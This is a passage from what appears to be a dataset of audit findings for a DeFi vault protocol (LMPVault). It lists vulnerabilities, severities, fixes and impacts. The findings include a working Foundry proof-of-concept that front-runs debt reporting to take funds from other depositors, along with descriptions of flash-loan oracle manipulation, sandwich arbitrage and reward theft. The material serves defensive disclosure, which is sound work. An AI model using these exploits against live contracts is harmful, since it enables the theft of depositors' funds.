and 1000 from bob\\nVault has invested that in 1000 in DestinationVault1 & 1000 in DestinationVault2 (no idle for simple calculations)\\nNow Dv1 gain a profit of 5%(+50 base asset) while Dv2 is in 10% loss(-100 base asset)\\nSo vault has net loss of 50. Now alice does a updateDebtReporting([Dv1]) and not including Dv2 in the input array.\\nNow she withdraws her money, protocol now falsely believes there is a profit, it also take 20% profit fees(assumed) and mints 10 shares for itself and alice walks away with roughly 1020 assets, incurring no loss\\nNow a legit updateDebtReporting txn comes and bob has to account in for the loss\\nTest for POC - Add it to LMPVaultMintingTests contract in LMPVault-Withdraw.t.sol file under path test/vault. run it via the command\\n```\\nforge test --match-path test/vault/LMPVault-Withdraw.t.sol --match-test test_AvoidTheLoss -vv\\n```\\n\\n```\\nfunction test_AvoidTheLoss() public {\\n\\n// for simplicity sake, i'll be assuming vault keeps nothing idle\\n\\n// as it does not affect the attack vector in any ways\\n\\n_accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n\\n_accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\naddress feeSink = vm.addr(555);\\n\\n_lmpVault.setFeeSink(feeSink);\\n\\n_lmpVault.setPerformanceFeeBps(2000); // 20%\\n\\naddress alice = address(789);\\n\\nuint initialBalanceAlice = 1000;\\n\\n// User is going to deposit 1000 asset\\n\\n_asset.mint(address(this), 1000);\\n\\n_asset.approve(address(_lmpVault), 1000);\\n\\nuint shareBalUser = _lmpVault.deposit(1000, address(this));\\n\\n_underlyerOne.mint(address(this),500);\\n\\n_underlyerOne.approve(address(_lmpVault),500);\\n\\n_lmpVault.rebalance(\\n\\naddress(_destVaultOne),\\n\\naddress(_underlyerOne),\\n\\n500,\\n\\naddress(0),\\n\\naddress(_asset),\\n\\n1000\\n\\n);\\n\\n_asset.mint(alice,initialBalanceAlice);\\n\\nvm.startPrank(alice);\\n\\n_asset.approve(address(_lmpVault),initialBalanceAlice);\\n\\nuint shareBalAlice = _lmpVault.deposit(initialBalanceAlice,alice);\\n\\nvm.stopPrank();\\n\\n// rebalance to 2nd vault\\n\\n_underlyerTwo.mint(address(this), 1000);\\n\\n_underlyerTwo.approve(address(_lmpVault),1000);\\n\\n_lmpVault.rebalance(\\n\\naddress(_destVaultTwo),\\n\\naddress(_underlyerTwo),\\n\\n1000,\\n\\naddress(0),\\n\\naddress(_asset),\\n\\n1000\\n\\n);\\n\\n// the second destVault incurs loss, 10%\\n\\n_mockRootPrice(address(_underlyerTwo), 0.9 ether);\\n\\n \\n\\n// the first vault incurs some profit, 5%\\n\\n// so lmpVault is in netLoss of 50 baseAsset\\n\\n_mockRootPrice(address(_underlyerOne), 2.1 ether);\\n\\n// malicious updateDebtReporting by alice\\n\\naddress[] memory alteredDestinations = new address[](1);\\n\\nalteredDestinations[0] = address(_destVaultOne);\\n\\nvm.prank(alice);\\n\\n_lmpVault.updateDebtReporting(alteredDestinations);\\n\\n \\n\\n// alice withdraws first\\n\\nvm.prank(alice);\\n\\n_lmpVault.redeem(shareBalAlice , alice,alice);\\n\\nuint finalBalanceAlice = _asset.balanceOf(alice);\\n\\nemit log_named_uint(\"final Balance of alice \", finalBalanceAlice);\\n\\n// protocol also collects its fees\\n\\n// further wrecking the remaining LPs\\n\\nemit log_named_uint(\"Fees shares give to feeSink \", _lmpVault.balanceOf(feeSink));\\n\\nassertGt( finalBalanceAlice, initialBalanceAlice);\\n\\nassertGt(_lmpVault.balanceOf(feeSink), 0);\\n\\n// now updateDebtReporting again but for all DVs\\n\\n_lmpVault.updateDebtReporting(_destinations);\\n\\n \\n\\nemit log_named_uint(\"Remaining LPs can only get \",_lmpVault.maxWithdraw(address(this)));\\n\\nemit log_named_uint(\"Protocol falsely earned(in base asset)\", _lmpVault.maxWithdraw(feeSink));\\n\\nemit log_named_uint(\"Vault totalAssets\" , _lmpVault.totalAssets());\\n\\nemit log_named_uint(\"Effective loss take by LPs\", 1000 - _lmpVault.maxWithdraw(address(this)));\\n\\nemit log_named_uint(\"Profit for Alice\",_asset.balanceOf(alice) - initialBalanceAlice);\\n\\n}\\n```\\n\\nLogs: final Balance of alice : 1019 Fees shares give to feeSink : 10 Remaining LPs can only get : 920 Protocol falsely earned(in base asset): 9 Vault totalAssets: 930 Effective loss take by LPs: 80 Profit for Alice: 19чupdateDebtReporting should not have any input param, should by default update for all added destination vaultsчTheft of user funds. Submitting as high as attacker only needs to frontrun a updateDebtReporting txn with malicious input and withdraw his funds.ч```\\nforge test --match-path test/vault/LMPVault-Withdraw.t.sol --match-test test_AvoidTheLoss -vv\\n```\\n -Inflated price due to unnecessary precision scalingчhighчThe `price` at Line 137 below is denominated in 18 decimals as the `getPriceInEth` function always returns the `price` in 18 decimals precision.\\nThere is no need to scale the accumulated price by 1e18.\\nIt will cause the average price (existing._initAcc) to be inflated significantly\\nThe numerator will almost always be larger than the denominator (INIT_SAMPLE_COUNT = 18). There is no risk of it rounding to zero, so any scaling is unnecessary.\\nAssume that throughout the initialization process, the `getPriceInEth(XYZ)` always returns 2 ETH (2e18). After 18 rounds (INIT_SAMPLE_COUNT == 18) of initialization, `existing._initAcc` will equal 36 ETH (36e18). As such, the `averagePrice` will be as follows:\\n```\\naveragePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\naveragePrice = 36e18 * 1e18 / 18\\naveragePrice = 36e36 / 18\\naveragePrice = 2e36\\n```\\n\\n`existing.fastFilterPrice` and `existing.slowFilterPrice` will be set to `2e36` at Lines 157 and 158 below.\\nIn the post-init phase, the `getPriceInEth` function return 3 ETH (3e18). Thus, the following code will be executed at Line 144s and 155 below:\\n```\\nexisting.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, existing.slowFilterPrice, price);\\nexisting.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, existing.fastFilterPrice, price);\\n\\nexisting.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, 2e36, 3e18); // SLOW_ALPHA = 645e14; // 0.0645\\nexisting.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, 2e36, 3e18); // FAST_ALPHA = 33e16; // 0.33\\n```\\n\\nAs shown above, the existing filter prices are significantly inflated by the scale of 1e18, which results in the prices being extremely skewed.\\nUsing the formula of fast filter, the final fast filter price computed will be as follows:\\n```\\n((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18\\n((priorValue * (1e18 - 33e16)) + (currentValue * 33e16)) / 1e18\\n((priorValue * 67e16) + (currentValue * 33e16)) / 1e18\\n((2e36 * 67e16) + (3e18 * 33e16)) / 1e18\\n1.34e36 (1340000000000000000 ETH)\\n```\\n\\nThe token is supposed only to be worth around 3 ETH. However, the fast filter price wrongly determine that it is worth around 1340000000000000000 ETH\\n```\\nFile: IncentivePricingStats.sol\\n function updatePricingInfo(IRootPriceOracle pricer, address token) internal {\\n..SNIP..\\n uint256 price = pricer.getPriceInEth(token);\\n\\n // update the timestamp no matter what phase we're in\\n existing.lastSnapshot = uint40(block.timestamp);\\n\\n if (existing._initComplete) {\\n // post-init phase, just update the filter values\\n existing.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, existing.slowFilterPrice, price);\\n existing.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, existing.fastFilterPrice, price);\\n } else {\\n // still the initialization phase\\n existing._initCount += 1;\\n existing._initAcc += price;\\n\\n // snapshot count is tracked internally and cannot be manipulated\\n // slither-disable-next-line incorrect-equality\\n if (existing._initCount == INIT_SAMPLE_COUNT) { // @audit-info INIT_SAMPLE_COUNT = 18;\\n // if this sample hits the target number, then complete initialize and set the filters\\n existing._initComplete = true;\\n uint256 averagePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\n existing.fastFilterPrice = averagePrice;\\n existing.slowFilterPrice = averagePrice;\\n }\\n }\\n```\\nчRemove the 1e18 scaling.\\n```\\nif (existing._initCount == INIT_SAMPLE_COUNT) {\\n // if this sample hits the target number, then complete initialize and set the filters\\n existing._initComplete = true;\\n// Remove the line below\\n uint256 averagePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\n// Add the line below\\n uint256 averagePrice = existing._initAcc / INIT_SAMPLE_COUNT;\\n existing.fastFilterPrice = averagePrice;\\n existing.slowFilterPrice = averagePrice;\\n}\\n```\\nчThe price returned by the stat calculators will be excessively inflated. The purpose of the stats/calculators contracts is to store, augment, and clean data relevant to the LMPs. When the solver proposes a rebalance, the strategy uses the stats contracts to calculate a composite return (score) for the proposed destinations. Using that composite return, it determines if the swap is beneficial for the vault.\\nIf a stat calculator provides incorrect and inflated pricing, it can cause multiple implications that lead to losses to the protocol, such as false signals allowing the unprofitable rebalance to be executed.ч```\\naveragePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\naveragePrice = 36e18 * 1e18 / 18\\naveragePrice = 36e36 / 18\\naveragePrice = 2e36\\n```\\n -Immediately start getting rewards belonging to others after stakingчhighчNote This issue affects both LMPVault and DV since they use the same underlying reward contract.\\nAssume a new user called Bob mints 100 LMPVault or DV shares. The ERC20's `_mint` function will be called, which will first increase Bob's balance at Line 267 and then trigger the `_afterTokenTransfer` hook at Line 271.\\n```\\nFile: ERC20.sol\\n function _mint(address account, uint256 amount) internal virtual {\\n..SNIP..\\n _beforeTokenTransfer(address(0), account, amount);\\n\\n _totalSupply += amount;\\n unchecked {\\n // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.\\n _balances[account] += amount;\\n }\\n..SNIP..\\n _afterTokenTransfer(address(0), account, amount);\\n }\\n```\\n\\nThe `_afterTokenTransfer` hook will automatically stake the newly minted shares to the rewarder contracts on behalf of Bob.\\n```\\nFile: LMPVault.sol\\n function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual override {\\n..SNIP..\\n if (to != address(0)) {\\n rewarder.stake(to, amount);\\n }\\n }\\n```\\n\\nWithin the `MainRewarder.stake` function, it will first call the `_updateReward` function at Line 87 to take a snapshot of accumulated rewards. Since Bob is a new user, his accumulated rewards should be zero. However, this turned out to be false due to the bug described in this report.\\n```\\nFile: MainRewarder.sol\\n function stake(address account, uint256 amount) public onlyStakeTracker {\\n _updateReward(account);\\n _stake(account, amount);\\n\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).stake(account, amount);\\n }\\n }\\n```\\n\\nWhen the `_updateReward` function is executed, it will compute Bob's earned rewards. It is important to note that at this point, Bob's balance has already been updated to 100 shares in the `stakeTracker` contract, and `userRewardPerTokenPaid[Bob]` is zero.\\nBob's earned reward will be as follows, where $r$ is the rewardPerToken():\\n$$ earned(Bob) = 100\\ {shares \\times (r - 0)} = 100r $$\\nBob immediately accumulated a reward of $100r$ upon staking into the rewarder contract, which is incorrect. Bob could withdraw $100r$ reward tokens that do not belong to him.\\n```\\nFile: AbstractRewarder.sol\\n function _updateReward(address account) internal {\\n uint256 earnedRewards = 0;\\n rewardPerTokenStored = rewardPerToken();\\n lastUpdateBlock = lastBlockRewardApplicable();\\n\\n if (account != address(0)) {\\n earnedRewards = earned(account);\\n rewards[account] = earnedRewards;\\n userRewardPerTokenPaid[account] = rewardPerTokenStored;\\n }\\n\\n emit UserRewardUpdated(account, earnedRewards, rewardPerTokenStored, lastUpdateBlock);\\n }\\n..SNIP..\\n function balanceOf(address account) public view returns (uint256) {\\n return stakeTracker.balanceOf(account);\\n }\\n..SNIP..\\n function earned(address account) public view returns (uint256) {\\n return (balanceOf(account) * (rewardPerToken() - userRewardPerTokenPaid[account]) / 1e18) + rewards[account];\\n }\\n```\\nчEnsure that the balance of the users in the rewarder contract is only incremented after the `_updateReward` function is executed.\\nOne option is to track the balance of the staker and total supply internally within the rewarder contract and avoid reading the states in the `stakeTracker` contract, commonly seen in many reward contracts.\\n```\\nFile: AbstractRewarder.sol\\nfunction balanceOf(address account) public view returns (uint256) {\\n// Remove the line below\\n return stakeTracker.balanceOf(account);\\n// Add the line below\\n return _balances[account];\\n}\\n```\\n\\n```\\nFile: AbstractRewarder.sol\\nfunction _stake(address account, uint256 amount) internal {\\n Errors.verifyNotZero(account, \"account\");\\n Errors.verifyNotZero(amount, \"amount\");\\n \\n// Add the line below\\n _totalSupply // Add the line below\\n= amount\\n// Add the line below\\n _balances[account] // Add the line below\\n= amount\\n\\n emit Staked(account, amount);\\n}\\n```\\nчLoss of reward tokens for the vault shareholders.ч```\\nFile: ERC20.sol\\n function _mint(address account, uint256 amount) internal virtual {\\n..SNIP..\\n _beforeTokenTransfer(address(0), account, amount);\\n\\n _totalSupply += amount;\\n unchecked {\\n // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.\\n _balances[account] += amount;\\n }\\n..SNIP..\\n _afterTokenTransfer(address(0), account, amount);\\n }\\n```\\n -Differences between actual and cached total assets can be arbitragedчhighчThe actual total amount of assets that are owned by a LMPVault on-chain can be derived via the following formula:\\n$$ totalAssets_{actual} = \\sum_{n=1}^{x}debtValue(DV_n) $$\\nWhen `LMPVault.totalAssets()` function is called, it returns the cached total assets of the LMPVault instead.\\n$$ totalAssets_{cached} = totalIdle + totalDebt $$\\n```\\nFile: LMPVault.sol\\n function totalAssets() public view override returns (uint256) {\\n return totalIdle + totalDebt;\\n }\\n```\\n\\nThus, the $totalAssets_{cached}$ will deviate from $totalAssets_{actual}$. This difference could be arbitraged or exploited by malicious users for their gain.\\nCertain actions such as `previewDeposit`, `previewMint`, `previewWithdraw,` and `previewRedeem` functions rely on the $totalAssets_{cached}$ value while other actions such as `_withdraw` and `_calcUserWithdrawSharesToBurn` functions rely on $totalAssets_{actual}$ value.\\nThe following shows one example of the issue.\\nThe `previewDeposit(assets)` function computed the number of shares to be received after depositing a specific amount of assets:\\n$$ shareReceived = \\frac{assets_{deposited}}{totalAssets_{cached}} \\times totalSupply $$\\nAssume that $totalAssets_{cached} < totalAssets_{actual}$, and the values of the variables are as follows:\\n$totalAssets_{cached}$ = 110 WETH\\n$totalAssets_{actual}$ = 115 WETH\\n$totalSupply$ = 100 shares\\nAssume Bob deposited 10 WETH when the total assets are 110 WETH (when $totalAssets_{cached} < totalAssets_{actual}$), he would receive:\\n$$ \\begin{align} shareReceived &= \\frac{10 ETH}{110 ETH} \\times 100e18\\ shares \\ &= 9.090909091e18\\ shares \\end{align} $$\\nIf a user deposited 10 WETH while the total assets are updated to the actual worth of 115 WETH (when $totalAssets_{cached} == totalAssets_{actual}$, they would receive:\\n$$ \\begin{align} shareReceived &= \\frac{10 ETH}{115 ETH} \\times 100e18\\ shares \\ &= 8.695652174e18\\ shares \\ \\end{align} $$\\nTherefore, Bob is receiving more shares than expected.\\nIf Bob redeems all his nine (9) shares after the $totalAssets_{cached}$ has been updated to $totalAssets_{actual}$, he will receive 10.417 WETH back.\\n$$ \\begin{align} assetsReceived &= \\frac{9.090909091e18\\ shares}{(100e18 + 9.090909091e18)\\ shares} \\times (115 + 10)\\ ETH \\ &= \\frac{9.090909091e18\\ shares}{109.090909091e18\\ shares} \\times 125 ETH \\ &= 10.41666667\\ ETH \\end{align} $$\\nBob profits 0.417 WETH simply by arbitraging the difference between the cached and actual values of the total assets. Bob gains is the loss of other vault shareholders.\\nThe $totalAssets_{cached}$ can be updated to $totalAssets_{actual}$ by calling the permissionless `LMPVault.updateDebtReporting` function. Alternatively, one could also perform a sandwich attack against the `LMPVault.updateDebtReporting` function by front-run it to take advantage of the lower-than-expected price or NAV/share, and back-run it to sell the shares when the price or NAV/share rises after the update.\\nOne could also reverse the attack order, where an attacker withdraws at a higher-than-expected price or NAV/share, perform an update on the total assets, and deposit at a lower price or NAV/share.чConsider updating $totalAssets_{cached}$ to $totalAssets_{actual}$ before any withdrawal or deposit to mitigate this issue.чLoss assets for vault shareholders. Attacker gains are the loss of other vault shareholders.ч```\\nFile: LMPVault.sol\\n function totalAssets() public view override returns (uint256) {\\n return totalIdle + totalDebt;\\n }\\n```\\n -Incorrect pricing for CurveV2 LP TokenчhighчUsing the Curve rETH/frxETH pool (0xe7c6e0a739021cdba7aac21b4b728779eef974d9) to illustrate the issue:\\nThe price of the LP token of Curve rETH/frxETH pool can be obtained via the following `lp_price` function:\\n```\\ndef lp_price() -> uint256:\\n \"\"\"\\n Approximate LP token price\\n \"\"\"\\n return 2 * self.virtual_price * self.sqrt_int(self.internal_price_oracle()) / 10**18\\n```\\n\\nThus, the formula to obtain the price of the LP token is as follows:\\n$$ price_{LP} = 2 \\times virtualPrice \\times \\sqrt{internalPriceOracle} $$\\n```\\ndef price_oracle() -> uint256:\\n return self.internal_price_oracle()\\n```\\n\\nThe $internalPriceOracle$ is the price of coins[1](frxETH) with coins[0](rETH) as the quote currency, which means how many rETH (quote) are needed to purchase one frxETH (base).\\n$$ base/quote \\ frxETH/rETH $$\\nDuring pool registration, the `poolInfo.tokenToPrice` is always set to the second coin (coins[1]) as per Line 131 below. In this example, `poolInfo.tokenToPrice` will be set to frxETH token address (coins[1]).\\n```\\nFile: CurveV2CryptoEthOracle.sol\\n function registerPool(address curvePool, address curveLpToken, bool checkReentrancy) external onlyOwner {\\n..SNIP..\\n /**\\n * Curve V2 pools always price second token in `coins` array in first token in `coins` array. This means that\\n * if `coins[0]` is Weth, and `coins[1]` is rEth, the price will be rEth as base and weth as quote. Hence\\n * to get lp price we will always want to use the second token in the array, priced in eth.\\n */\\n lpTokenToPool[lpToken] =\\n PoolData({ pool: curvePool, checkReentrancy: checkReentrancy ? 1 : 0, tokenToPrice: tokens[1] });\\n```\\n\\nNote that `assetPrice` variable below is equivalent to $internalPriceOracle$ in the above formula.\\nWhen fetching the price of the LP token, Line 166 computes the price of frxETH with ETH as the quote currency ($frxETH/ETH$) via the `getPriceInEth` function, and assigns to the `assetPrice` variable.\\nHowever, the $internalPriceOracle$ or `assetPrice` should be $frxETH/rETH$ instead of $frxETH/ETH$. Thus, the price of the LP token computed will be incorrect.\\n```\\nFile: CurveV2CryptoEthOracle.sol\\n function getPriceInEth(address token) external returns (uint256 price) {\\n Errors.verifyNotZero(token, \"token\");\\n\\n PoolData memory poolInfo = lpTokenToPool[token];\\n if (poolInfo.pool == address(0)) revert NotRegistered(token);\\n\\n ICryptoSwapPool cryptoPool = ICryptoSwapPool(poolInfo.pool);\\n\\n // Checking for read only reentrancy scenario.\\n if (poolInfo.checkReentrancy == 1) {\\n // This will fail in a reentrancy situation.\\n cryptoPool.claim_admin_fees();\\n }\\n\\n uint256 virtualPrice = cryptoPool.get_virtual_price();\\n uint256 assetPrice = systemRegistry.rootPriceOracle().getPriceInEth(poolInfo.tokenToPrice);\\n\\n return (2 * virtualPrice * sqrt(assetPrice)) / 10 ** 18;\\n }\\n```\\nчIssue Incorrect pricing for CurveV2 LP Token\\nUpdate the `getPriceInEth` function to ensure that the $internalPriceOracle$ or `assetPrice` return the price of `coins[1]` with `coins[0]` as the quote currency.чThe protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIncorrect pricing of LP tokens would result in many implications that lead to a loss of assets, such as users withdrawing more or fewer assets than expected due to over/undervalued vaults or strategy allowing an unprofitable rebalance to be executed.ч```\\ndef lp_price() -> uint256:\\n \"\"\"\\n Approximate LP token price\\n \"\"\"\\n return 2 * self.virtual_price * self.sqrt_int(self.internal_price_oracle()) / 10**18\\n```\\n -Incorrect number of shares minted as feeчhighч```\\nFile: LMPVault.sol\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n```\\n\\nAssume that the following states:\\nThe `profit` is 100 WETH\\nThe fee is 20%, so the `fees` will be 20 WETH.\\n`totalSupply` is 100 shares and `totalAssets()` is 1000 WETH\\nLet the number of shares to be minted be $shares2mint$. The current implementation uses the following formula (simplified) to determine $shares2mint$.\\n$$ \\begin{align} shares2mint &= fees \\times \\frac{totalSupply}{totalAsset()} \\ &= 20\\ WETH \\times \\frac{100\\ shares}{1000\\ WETH} \\ &= 2\\ shares \\end{align} $$\\nIn this case, two (2) shares will be minted to the `sink` address as the fee is taken.\\nHowever, the above formula used in the codebase is incorrect. The total cost/value of the newly-minted shares does not correspond to the fee taken. Immediately after the mint, the value of the two (2) shares is worth only 19.60 WETH, which does not correspond to the 20 WETH fee that the `sink` address is entitled to.\\n$$ \\begin{align} value &= 2\\ shares \\times \\frac{1000\\ WETH}{100 + 2\\ shares} \\ &= 2\\ shares \\times 9.8039\\ WETH\\ &= 19.6078\\ WETH \\end{align} $$чThe correct formula to compute the number of shares minted as fee should be as follows:\\n$$ \\begin{align} shares2mint &= \\frac{profit \\times performanceFeeBps \\times totalSupply}{(totalAsset() \\times MAX_FEE_BPS) - (performanceFeeBps \\times profit) } \\ &= \\frac{100\\epsilon \\times 2000 \\times 100 shares}{(1000\\epsilon \\times 10000) - (2000 \\times 100\\epsilon)} \\ &= 2.0408163265306122448979591836735\\ shares \\end{align} $$\\nThe following is the proof to show that `2.0408163265306122448979591836735` shares are worth 20 WETH after the mint.\\n$$ \\begin{align} value &= 2.0408163265306122448979591836735\\ shares \\times \\frac{1000\\ WETH}{100 + 2.0408163265306122448979591836735\\ shares} \\ &= 2.0408163265306122448979591836735\\ shares \\times 9.8039\\ WETH\\ &= 20\\ WETH \\end{align} $$чLoss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.ч```\\nFile: LMPVault.sol\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n```\\n -Maverick oracle can be manipulatedчhighчIn the MavEthOracle contract, `getPriceInEth` function utilizes the reserves of the Maverick pool and multiplies them with the external prices of the tokens (obtained from the rootPriceOracle contract) to calculate the total value of the Maverick position.\\n```\\n// Get reserves in boosted position.\\n(uint256 reserveTokenA, uint256 reserveTokenB) = boostedPosition.getReserves();\\n\\n// Get total supply of lp tokens from boosted position.\\nuint256 boostedPositionTotalSupply = boostedPosition.totalSupply();\\n\\nIRootPriceOracle rootPriceOracle = systemRegistry.rootPriceOracle();\\n\\n// Price pool tokens.\\nuint256 priceInEthTokenA = rootPriceOracle.getPriceInEth(address(pool.tokenA()));\\nuint256 priceInEthTokenB = rootPriceOracle.getPriceInEth(address(pool.tokenB()));\\n\\n// Calculate total value of each token in boosted position.\\nuint256 totalBoostedPositionValueTokenA = reserveTokenA * priceInEthTokenA;\\nuint256 totalBoostedPositionValueTokenB = reserveTokenB * priceInEthTokenB;\\n\\n// Return price of lp token in boosted position.\\nreturn (totalBoostedPositionValueTokenA + totalBoostedPositionValueTokenB) / boostedPositionTotalSupply;\\n```\\n\\nHowever, the reserves of a Maverick position can fluctuate when the price of the Maverick pool changes. Therefore, the returned price of this function can be manipulated by swapping a significant amount of tokens into the Maverick pool. An attacker can utilize a flash loan to initiate a swap, thereby changing the price either upwards or downwards, and subsequently swapping back to repay the flash loan.\\nAttacker can decrease the returned price of MavEthOracle by swapping a large amount of the higher value token for the lower value token, and vice versa.\\nHere is a test file that demonstrates how the price of the MavEthOracle contract can be manipulated by swapping to change the reserves.чUse another calculation for Maverick oracleчThere are multiple impacts that an attacker can exploit by manipulating the price of MavEthOracle:\\nDecreasing the oracle price to lower the totalDebt of LMPVault, in order to receive more LMPVault shares.\\nIncreasing the oracle price to raise the totalDebt of LMPVault, in order to receive more withdrawn tokens.\\nManipulating the results of the Stats contracts to cause miscalculations for the protocol.ч```\\n// Get reserves in boosted position.\\n(uint256 reserveTokenA, uint256 reserveTokenB) = boostedPosition.getReserves();\\n\\n// Get total supply of lp tokens from boosted position.\\nuint256 boostedPositionTotalSupply = boostedPosition.totalSupply();\\n\\nIRootPriceOracle rootPriceOracle = systemRegistry.rootPriceOracle();\\n\\n// Price pool tokens.\\nuint256 priceInEthTokenA = rootPriceOracle.getPriceInEth(address(pool.tokenA()));\\nuint256 priceInEthTokenB = rootPriceOracle.getPriceInEth(address(pool.tokenB()));\\n\\n// Calculate total value of each token in boosted position.\\nuint256 totalBoostedPositionValueTokenA = reserveTokenA * priceInEthTokenA;\\nuint256 totalBoostedPositionValueTokenB = reserveTokenB * priceInEthTokenB;\\n\\n// Return price of lp token in boosted position.\\nreturn (totalBoostedPositionValueTokenA + totalBoostedPositionValueTokenB) / boostedPositionTotalSupply;\\n```\\n -Aura/Convex rewards are stuck after DOSчhighчAnyone can claim Convex rewards for any account.\\n```\\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n}\\n```\\n\\nIn ConvexRewardsAdapter, the rewards are accounted for by using balanceBefore/after.\\n```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n\\n uint256[] memory balancesBefore = new uint256[](totalLength);\\n uint256[] memory amountsClaimed = new uint256[](totalLength);\\n// rest of code\\n\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for \"stash tokens\"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n return (amountsClaimed, rewardTokens);\\n```\\n\\nAdversary can call the external convex contract's `getReward(tokemakContract)`. After this, the reward tokens are transferred to Tokemak without an accounting hook.\\nNow, when Tokemak calls claimRewards, then no new rewards are transferred, because the attacker already transferred them. `amountsClaimed` will be 0.чDon't use balanceBefore/After. You could consider using `balanceOf(address(this))` after claiming to see the full amount of tokens in the contract. This assumes that only the specific rewards balance is in the contract.чRewards are stuck in the LiquidationRow contract and not queued to the MainRewarder.ч```\\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n}\\n```\\n -`LMPVault._withdraw()` can revert due to an arithmetic underflowчmediumчInside the `_withdraw()` function, the `maxAssetsToPull` argument value of `_calcUserWithdrawSharesToBurn()` is calculated to be equal to `info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled)`. However, the `_withdraw()` function only halts its loop when `info.totalAssetsPulled >= info.totalAssetsToPull`. This can lead to a situation where `info.debtDecrease >= info.totalAssetsToPull`. Consequently, when calculating `info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled)` for the next destination vault in the loop, an underflow occurs and triggers a contract revert.\\nTo illustrate this vulnerability, consider the following scenario:\\n```\\n function test_revert_underflow() public {\\n _accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n _accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\n // User is going to deposit 1500 asset\\n _asset.mint(address(this), 1500);\\n _asset.approve(address(_lmpVault), 1500);\\n _lmpVault.deposit(1500, address(this));\\n\\n // Deployed 700 asset to DV1\\n _underlyerOne.mint(address(this), 700);\\n _underlyerOne.approve(address(_lmpVault), 700);\\n _lmpVault.rebalance(\\n address(_destVaultOne),\\n address(_underlyerOne), // tokenIn\\n 700,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 700\\n );\\n\\n // Deploy 600 asset to DV2\\n _underlyerTwo.mint(address(this), 600);\\n _underlyerTwo.approve(address(_lmpVault), 600);\\n _lmpVault.rebalance(\\n address(_destVaultTwo),\\n address(_underlyerTwo), // tokenIn\\n 600,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 600\\n );\\n\\n // Deployed 200 asset to DV3\\n _underlyerThree.mint(address(this), 200);\\n _underlyerThree.approve(address(_lmpVault), 200);\\n _lmpVault.rebalance(\\n address(_destVaultThree),\\n address(_underlyerThree), // tokenIn\\n 200,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 200\\n );\\n\\n // Drop the price of DV2 to 70% of original, so that 600 we transferred out is now only worth 420\\n _mockRootPrice(address(_underlyerTwo), 7e17);\\n\\n // Revert because of an arithmetic underflow\\n vm.expectRevert();\\n uint256 assets = _lmpVault.redeem(1000, address(this), address(this));\\n }\\n```\\nчIssue `LMPVault._withdraw()` can revert due to an arithmetic underflow\\nTo mitigate this vulnerability, it is recommended to break the loop within the `_withdraw()` function if `Math.max(info.debtDecrease, info.totalAssetsPulled) >= info.totalAssetsToPull`\\n```\\n if (\\n Math.max(info.debtDecrease, info.totalAssetsPulled) >\\n info.totalAssetsToPull\\n ) 